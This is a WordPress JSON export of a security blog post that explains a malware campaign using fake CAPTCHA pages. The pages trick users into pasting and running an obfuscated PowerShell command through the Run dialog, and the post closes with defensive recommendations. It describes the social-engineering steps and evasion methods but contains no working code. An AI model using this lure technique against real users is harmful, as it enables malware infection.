{"id":22152,"date":"2025-08-05T09:06:59","date_gmt":"2025-08-05T02:06:59","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=22152"},"modified":"2026-01-20T10:23:37","modified_gmt":"2026-01-20T03:23:37","slug":"cybercriminals-exploit-im-not-a-robot-captchas","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/cybercriminals-exploit-im-not-a-robot-captchas\/","title":{"rendered":"Cybercriminals Exploit &#8220;I&#8217;m Not a Robot&#8221; Captchas for Malware"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p>A new sophisticated malware attack exploits users through fake browser verification windows designed to resemble legitimate CAPTCHA systems.<\/p>\n<h1 id=\"heading-how-it-works\" class=\"permalink-heading\"><strong>How it Works<\/strong><\/h1>\n<p>The attack begins when users encounter a seemingly authentic browser security check page, featuring the familiar &#8220;I\u2019m not a Robot&#8221; interface similar to Google\u2019s reCAPTCHA system.<\/p>\n<p>However, instead of clicking on squares or selecting images as usual, this fake verification interface instructs users to perform a series of keyboard shortcuts to &#8220;complete the browser check.&#8221;<\/p>\n<p>The malicious interface presents three seemingly harmless steps:<\/p>\n<ol>\n<li>Press Windows + R to open the Run dialog box,<\/li>\n<li>Press Ctrl + V to paste content from the clipboard,<\/li>\n<li>Press Enter to execute the command.<\/li>\n<\/ol>\n<\/div>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/unnamed-1751595869.png\"><img decoding=\"async\" class=\"size-full wp-image-22154 aligncenter\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/unnamed-1751595869.png\" alt=\"Unnamed 1751595869\" width=\"430\" height=\"472\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 1. Process of performing malicious behavior<\/em><\/p>\n<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p>Attackers have meticulously designed the interface to look authentic, using visual elements and language similar to legitimate security checks.<\/p>\n<h1 id=\"heading-technical-analysis\" class=\"permalink-heading\"><strong>Technical Analysis<\/strong><\/h1>\n<p>Technical analysis reveals that the core of the attack lies in clipboard manipulation and the use of sophisticated PowerShell obfuscation techniques.<\/p>\n<p>When users visit the malicious website, a JavaScript code automatically copies an obfuscated PowerShell command string into the clipboard without the user&#8217;s knowledge.<\/p>\n<p>This PowerShell payload employs multiple layers of obfuscation, including base64 encoding, string concatenation, and variable substitution to evade static analysis tools and signature-based AV detection.<\/p>\n<p>The obfuscated PowerShell command typically contains instructions to download and execute additional malicious payloads from a remote server. Notably, security analysts have observed many fileless attack variants\u2014malware that operates only in memory (RAM) without writing files to the hard drive\u2014making detection even more challenging.<\/p>\n<p>Additionally, the PowerShell execution uses legitimate Windows processes and services, making the malware appear as normal system activities while maintaining persistence through registry modifications or scheduled tasks.<\/p>\n<h1 id=\"heading-recommendations\" class=\"permalink-heading\"><strong>Recommendations<\/strong><\/h1>\n<p><strong>FPT Threat Intelligence<\/strong>\u00a0recommends several measures for organizations and individuals to prevent this dangerous attack campaign:<\/p>\n<ul>\n<li><strong>Configure Browser Security:<\/strong>\u00a0Disable automatic clipboard access to prevent malicious websites from copying malware into the user&#8217;s clipboard.<\/li>\n<li><strong>Enhance Security Awareness Training:<\/strong>\u00a0Educate users on distinguishing between real and fake CAPTCHAs; emphasize that legitimate browser verification systems do not require executing commands via the Run dialog or Command Prompt.<\/li>\n<li><strong>Monitor PowerShell Execution Behavior:<\/strong>\u00a0Implement Endpoint Detection and Response (EDR) solutions to detect abnormal PowerShell command patterns, especially those related to network connections or system configuration changes.<\/li>\n<li><strong>Strengthen Network Security:<\/strong>\u00a0Configure security devices to identify typical attack traffic patterns such as malware downloads and Command-and-Control (C2) communications.<\/li>\n<li><strong>Reduce Attack Surface with System Policies:<\/strong>\u00a0Deploy application whitelisting mechanisms and strict PowerShell execution policies to prevent unauthorized script execution within the system.<\/li>\n<\/ul>\n<h1 id=\"heading-references\" class=\"permalink-heading\"><strong>References<\/strong><\/h1>\n<ul>\n<li><a href=\"https:\/\/cybersecuritynews.com\/malware-attack-im-not-a-robot-check\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>New Malware Attack Via \u201cI\u2019m not a Robot Check\u201d to Trick Users into Running Malware<\/strong><\/a><\/li>\n<\/ul>\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/p>\n<p><em>Tran Hoang Phong \u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div class=\"-mt-5 mb-10\"><\/div>\n","protected":false},"author":21,"featured_media":22148,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[858,712],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-22152","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing","dich_vu-private-sector-news","dich_vu-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/22152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/22148"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=22152"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=22152"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=22152"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=22152"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=22152"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=22152"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=22152"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=22152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}